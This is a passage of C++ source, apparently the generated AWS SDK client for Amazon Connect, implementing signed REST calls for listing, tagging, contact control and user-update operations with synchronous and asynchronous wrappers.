return ListContactFlowsOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [InstanceId]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/contact-flows-summary/";
ss << request.GetInstanceId();
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_GET, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return ListContactFlowsOutcome(ListContactFlowsResult(outcome.GetResult()));
}
else
{
return ListContactFlowsOutcome(outcome.GetError());
}
}
ListContactFlowsOutcomeCallable ConnectClient::ListContactFlowsCallable(const ListContactFlowsRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< ListContactFlowsOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->ListContactFlows(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::ListContactFlowsAsync(const ListContactFlowsRequest& request, const ListContactFlowsResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->ListContactFlowsAsyncHelper( request, handler, context ); } );
}
void ConnectClient::ListContactFlowsAsyncHelper(const ListContactFlowsRequest& request, const ListContactFlowsResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, ListContactFlows(request), context);
}
ListHoursOfOperationsOutcome ConnectClient::ListHoursOfOperations(const ListHoursOfOperationsRequest& request) const
{
if (!request.InstanceIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("ListHoursOfOperations", "Required field: InstanceId, is not set");
return ListHoursOfOperationsOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [InstanceId]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/hours-of-operations-summary/";
ss << request.GetInstanceId();
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_GET, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return ListHoursOfOperationsOutcome(ListHoursOfOperationsResult(outcome.GetResult()));
}
else
{
return ListHoursOfOperationsOutcome(outcome.GetError());
}
}
ListHoursOfOperationsOutcomeCallable ConnectClient::ListHoursOfOperationsCallable(const ListHoursOfOperationsRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< ListHoursOfOperationsOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->ListHoursOfOperations(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::ListHoursOfOperationsAsync(const ListHoursOfOperationsRequest& request, const ListHoursOfOperationsResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->ListHoursOfOperationsAsyncHelper( request, handler, context ); } );
}
void ConnectClient::ListHoursOfOperationsAsyncHelper(const ListHoursOfOperationsRequest& request, const ListHoursOfOperationsResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, ListHoursOfOperations(request), context);
}
ListPhoneNumbersOutcome ConnectClient::ListPhoneNumbers(const ListPhoneNumbersRequest& request) const
{
if (!request.InstanceIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("ListPhoneNumbers", "Required field: InstanceId, is not set");
return ListPhoneNumbersOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [InstanceId]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/phone-numbers-summary/";
ss << request.GetInstanceId();
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_GET, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return ListPhoneNumbersOutcome(ListPhoneNumbersResult(outcome.GetResult()));
}
else
{
return ListPhoneNumbersOutcome(outcome.GetError());
}
}
ListPhoneNumbersOutcomeCallable ConnectClient::ListPhoneNumbersCallable(const ListPhoneNumbersRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< ListPhoneNumbersOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->ListPhoneNumbers(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::ListPhoneNumbersAsync(const ListPhoneNumbersRequest& request, const ListPhoneNumbersResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->ListPhoneNumbersAsyncHelper( request, handler, context ); } );
}
void ConnectClient::ListPhoneNumbersAsyncHelper(const ListPhoneNumbersRequest& request, const ListPhoneNumbersResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, ListPhoneNumbers(request), context);
}
ListQueuesOutcome ConnectClient::ListQueues(const ListQueuesRequest& request) const
{
if (!request.InstanceIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("ListQueues", "Required field: InstanceId, is not set");
return ListQueuesOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [InstanceId]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/queues-summary/";
ss << request.GetInstanceId();
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_GET, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return ListQueuesOutcome(ListQueuesResult(outcome.GetResult()));
}
else
{
return ListQueuesOutcome(outcome.GetError());
}
}
ListQueuesOutcomeCallable ConnectClient::ListQueuesCallable(const ListQueuesRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< ListQueuesOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->ListQueues(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::ListQueuesAsync(const ListQueuesRequest& request, const ListQueuesResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->ListQueuesAsyncHelper( request, handler, context ); } );
}
void ConnectClient::ListQueuesAsyncHelper(const ListQueuesRequest& request, const ListQueuesResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, ListQueues(request), context);
}
ListRoutingProfilesOutcome ConnectClient::ListRoutingProfiles(const ListRoutingProfilesRequest& request) const
{
if (!request.InstanceIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("ListRoutingProfiles", "Required field: InstanceId, is not set");
return ListRoutingProfilesOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [InstanceId]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/routing-profiles-summary/";
ss << request.GetInstanceId();
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_GET, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return ListRoutingProfilesOutcome(ListRoutingProfilesResult(outcome.GetResult()));
}
else
{
return ListRoutingProfilesOutcome(outcome.GetError());
}
}
ListRoutingProfilesOutcomeCallable ConnectClient::ListRoutingProfilesCallable(const ListRoutingProfilesRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< ListRoutingProfilesOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->ListRoutingProfiles(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::ListRoutingProfilesAsync(const ListRoutingProfilesRequest& request, const ListRoutingProfilesResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->ListRoutingProfilesAsyncHelper( request, handler, context ); } );
}
void ConnectClient::ListRoutingProfilesAsyncHelper(const ListRoutingProfilesRequest& request, const ListRoutingProfilesResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, ListRoutingProfiles(request), context);
}
ListSecurityProfilesOutcome ConnectClient::ListSecurityProfiles(const ListSecurityProfilesRequest& request) const
{
if (!request.InstanceIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("ListSecurityProfiles", "Required field: InstanceId, is not set");
return ListSecurityProfilesOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [InstanceId]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/security-profiles-summary/";
ss << request.GetInstanceId();
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_GET, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return ListSecurityProfilesOutcome(ListSecurityProfilesResult(outcome.GetResult()));
}
else
{
return ListSecurityProfilesOutcome(outcome.GetError());
}
}
ListSecurityProfilesOutcomeCallable ConnectClient::ListSecurityProfilesCallable(const ListSecurityProfilesRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< ListSecurityProfilesOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->ListSecurityProfiles(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::ListSecurityProfilesAsync(const ListSecurityProfilesRequest& request, const ListSecurityProfilesResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->ListSecurityProfilesAsyncHelper( request, handler, context ); } );
}
void ConnectClient::ListSecurityProfilesAsyncHelper(const ListSecurityProfilesRequest& request, const ListSecurityProfilesResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, ListSecurityProfiles(request), context);
}
ListTagsForResourceOutcome ConnectClient::ListTagsForResource(const ListTagsForResourceRequest& request) const
{
if (!request.ResourceArnHasBeenSet())
{
AWS_LOGSTREAM_ERROR("ListTagsForResource", "Required field: ResourceArn, is not set");
return ListTagsForResourceOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [ResourceArn]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/tags/";
ss << request.GetResourceArn();
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_GET, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return ListTagsForResourceOutcome(ListTagsForResourceResult(outcome.GetResult()));
}
else
{
return ListTagsForResourceOutcome(outcome.GetError());
}
}
ListTagsForResourceOutcomeCallable ConnectClient::ListTagsForResourceCallable(const ListTagsForResourceRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< ListTagsForResourceOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->ListTagsForResource(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::ListTagsForResourceAsync(const ListTagsForResourceRequest& request, const ListTagsForResourceResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->ListTagsForResourceAsyncHelper( request, handler, context ); } );
}
void ConnectClient::ListTagsForResourceAsyncHelper(const ListTagsForResourceRequest& request, const ListTagsForResourceResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, ListTagsForResource(request), context);
}
ListUserHierarchyGroupsOutcome ConnectClient::ListUserHierarchyGroups(const ListUserHierarchyGroupsRequest& request) const
{
if (!request.InstanceIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("ListUserHierarchyGroups", "Required field: InstanceId, is not set");
return ListUserHierarchyGroupsOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [InstanceId]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/user-hierarchy-groups-summary/";
ss << request.GetInstanceId();
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_GET, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return ListUserHierarchyGroupsOutcome(ListUserHierarchyGroupsResult(outcome.GetResult()));
}
else
{
return ListUserHierarchyGroupsOutcome(outcome.GetError());
}
}
ListUserHierarchyGroupsOutcomeCallable ConnectClient::ListUserHierarchyGroupsCallable(const ListUserHierarchyGroupsRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< ListUserHierarchyGroupsOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->ListUserHierarchyGroups(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::ListUserHierarchyGroupsAsync(const ListUserHierarchyGroupsRequest& request, const ListUserHierarchyGroupsResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->ListUserHierarchyGroupsAsyncHelper( request, handler, context ); } );
}
void ConnectClient::ListUserHierarchyGroupsAsyncHelper(const ListUserHierarchyGroupsRequest& request, const ListUserHierarchyGroupsResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, ListUserHierarchyGroups(request), context);
}
ListUsersOutcome ConnectClient::ListUsers(const ListUsersRequest& request) const
{
if (!request.InstanceIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("ListUsers", "Required field: InstanceId, is not set");
return ListUsersOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [InstanceId]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/users-summary/";
ss << request.GetInstanceId();
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_GET, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return ListUsersOutcome(ListUsersResult(outcome.GetResult()));
}
else
{
return ListUsersOutcome(outcome.GetError());
}
}
ListUsersOutcomeCallable ConnectClient::ListUsersCallable(const ListUsersRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< ListUsersOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->ListUsers(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::ListUsersAsync(const ListUsersRequest& request, const ListUsersResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->ListUsersAsyncHelper( request, handler, context ); } );
}
void ConnectClient::ListUsersAsyncHelper(const ListUsersRequest& request, const ListUsersResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, ListUsers(request), context);
}
StartChatContactOutcome ConnectClient::StartChatContact(const StartChatContactRequest& request) const
{
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/contact/chat";
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_PUT, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return StartChatContactOutcome(StartChatContactResult(outcome.GetResult()));
}
else
{
return StartChatContactOutcome(outcome.GetError());
}
}
StartChatContactOutcomeCallable ConnectClient::StartChatContactCallable(const StartChatContactRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< StartChatContactOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->StartChatContact(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::StartChatContactAsync(const StartChatContactRequest& request, const StartChatContactResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->StartChatContactAsyncHelper( request, handler, context ); } );
}
void ConnectClient::StartChatContactAsyncHelper(const StartChatContactRequest& request, const StartChatContactResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, StartChatContact(request), context);
}
StartOutboundVoiceContactOutcome ConnectClient::StartOutboundVoiceContact(const StartOutboundVoiceContactRequest& request) const
{
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/contact/outbound-voice";
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_PUT, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return StartOutboundVoiceContactOutcome(StartOutboundVoiceContactResult(outcome.GetResult()));
}
else
{
return StartOutboundVoiceContactOutcome(outcome.GetError());
}
}
StartOutboundVoiceContactOutcomeCallable ConnectClient::StartOutboundVoiceContactCallable(const StartOutboundVoiceContactRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< StartOutboundVoiceContactOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->StartOutboundVoiceContact(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::StartOutboundVoiceContactAsync(const StartOutboundVoiceContactRequest& request, const StartOutboundVoiceContactResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->StartOutboundVoiceContactAsyncHelper( request, handler, context ); } );
}
void ConnectClient::StartOutboundVoiceContactAsyncHelper(const StartOutboundVoiceContactRequest& request, const StartOutboundVoiceContactResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, StartOutboundVoiceContact(request), context);
}
StopContactOutcome ConnectClient::StopContact(const StopContactRequest& request) const
{
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/contact/stop";
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_POST, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return StopContactOutcome(StopContactResult(outcome.GetResult()));
}
else
{
return StopContactOutcome(outcome.GetError());
}
}
StopContactOutcomeCallable ConnectClient::StopContactCallable(const StopContactRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< StopContactOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->StopContact(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::StopContactAsync(const StopContactRequest& request, const StopContactResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->StopContactAsyncHelper( request, handler, context ); } );
}
void ConnectClient::StopContactAsyncHelper(const StopContactRequest& request, const StopContactResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, StopContact(request), context);
}
TagResourceOutcome ConnectClient::TagResource(const TagResourceRequest& request) const
{
if (!request.ResourceArnHasBeenSet())
{
AWS_LOGSTREAM_ERROR("TagResource", "Required field: ResourceArn, is not set");
return TagResourceOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [ResourceArn]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/tags/";
ss << request.GetResourceArn();
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_POST, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return TagResourceOutcome(NoResult());
}
else
{
return TagResourceOutcome(outcome.GetError());
}
}
TagResourceOutcomeCallable ConnectClient::TagResourceCallable(const TagResourceRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< TagResourceOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->TagResource(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::TagResourceAsync(const TagResourceRequest& request, const TagResourceResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->TagResourceAsyncHelper( request, handler, context ); } );
}
void ConnectClient::TagResourceAsyncHelper(const TagResourceRequest& request, const TagResourceResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, TagResource(request), context);
}
UntagResourceOutcome ConnectClient::UntagResource(const UntagResourceRequest& request) const
{
if (!request.ResourceArnHasBeenSet())
{
AWS_LOGSTREAM_ERROR("UntagResource", "Required field: ResourceArn, is not set");
return UntagResourceOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [ResourceArn]", false));
}
if (!request.TagKeysHasBeenSet())
{
AWS_LOGSTREAM_ERROR("UntagResource", "Required field: TagKeys, is not set");
return UntagResourceOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [TagKeys]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/tags/";
ss << request.GetResourceArn();
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_DELETE, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return UntagResourceOutcome(NoResult());
}
else
{
return UntagResourceOutcome(outcome.GetError());
}
}
UntagResourceOutcomeCallable ConnectClient::UntagResourceCallable(const UntagResourceRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< UntagResourceOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->UntagResource(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::UntagResourceAsync(const UntagResourceRequest& request, const UntagResourceResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->UntagResourceAsyncHelper( request, handler, context ); } );
}
void ConnectClient::UntagResourceAsyncHelper(const UntagResourceRequest& request, const UntagResourceResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, UntagResource(request), context);
}
UpdateContactAttributesOutcome ConnectClient::UpdateContactAttributes(const UpdateContactAttributesRequest& request) const
{
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/contact/attributes";
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_POST, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return UpdateContactAttributesOutcome(UpdateContactAttributesResult(outcome.GetResult()));
}
else
{
return UpdateContactAttributesOutcome(outcome.GetError());
}
}
UpdateContactAttributesOutcomeCallable ConnectClient::UpdateContactAttributesCallable(const UpdateContactAttributesRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< UpdateContactAttributesOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->UpdateContactAttributes(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::UpdateContactAttributesAsync(const UpdateContactAttributesRequest& request, const UpdateContactAttributesResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->UpdateContactAttributesAsyncHelper( request, handler, context ); } );
}
void ConnectClient::UpdateContactAttributesAsyncHelper(const UpdateContactAttributesRequest& request, const UpdateContactAttributesResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, UpdateContactAttributes(request), context);
}
UpdateUserHierarchyOutcome ConnectClient::UpdateUserHierarchy(const UpdateUserHierarchyRequest& request) const
{
if (!request.UserIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("UpdateUserHierarchy", "Required field: UserId, is not set");
return UpdateUserHierarchyOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [UserId]", false));
}
if (!request.InstanceIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("UpdateUserHierarchy", "Required field: InstanceId, is not set");
return UpdateUserHierarchyOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [InstanceId]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/users/";
ss << request.GetInstanceId();
ss << "/";
ss << request.GetUserId();
ss << "/hierarchy";
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_POST, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return UpdateUserHierarchyOutcome(NoResult());
}
else
{
return UpdateUserHierarchyOutcome(outcome.GetError());
}
}
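// The path assembled above resolves to "/users/{InstanceId}/{UserId}/hierarchy";
// the remaining UpdateUser* operations below differ only in the trailing segment.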
UpdateUserHierarchyOutcomeCallable ConnectClient::UpdateUserHierarchyCallable(const UpdateUserHierarchyRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< UpdateUserHierarchyOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->UpdateUserHierarchy(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::UpdateUserHierarchyAsync(const UpdateUserHierarchyRequest& request, const UpdateUserHierarchyResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->UpdateUserHierarchyAsyncHelper( request, handler, context ); } );
}
void ConnectClient::UpdateUserHierarchyAsyncHelper(const UpdateUserHierarchyRequest& request, const UpdateUserHierarchyResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, UpdateUserHierarchy(request), context);
}
UpdateUserIdentityInfoOutcome ConnectClient::UpdateUserIdentityInfo(const UpdateUserIdentityInfoRequest& request) const
{
if (!request.UserIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("UpdateUserIdentityInfo", "Required field: UserId, is not set");
return UpdateUserIdentityInfoOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [UserId]", false));
}
if (!request.InstanceIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("UpdateUserIdentityInfo", "Required field: InstanceId, is not set");
return UpdateUserIdentityInfoOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [InstanceId]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/users/";
ss << request.GetInstanceId();
ss << "/";
ss << request.GetUserId();
ss << "/identity-info";
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_POST, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return UpdateUserIdentityInfoOutcome(NoResult());
}
else
{
return UpdateUserIdentityInfoOutcome(outcome.GetError());
}
}
UpdateUserIdentityInfoOutcomeCallable ConnectClient::UpdateUserIdentityInfoCallable(const UpdateUserIdentityInfoRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< UpdateUserIdentityInfoOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->UpdateUserIdentityInfo(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::UpdateUserIdentityInfoAsync(const UpdateUserIdentityInfoRequest& request, const UpdateUserIdentityInfoResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->UpdateUserIdentityInfoAsyncHelper( request, handler, context ); } );
}
void ConnectClient::UpdateUserIdentityInfoAsyncHelper(const UpdateUserIdentityInfoRequest& request, const UpdateUserIdentityInfoResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, UpdateUserIdentityInfo(request), context);
}
UpdateUserPhoneConfigOutcome ConnectClient::UpdateUserPhoneConfig(const UpdateUserPhoneConfigRequest& request) const
{
if (!request.UserIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("UpdateUserPhoneConfig", "Required field: UserId, is not set");
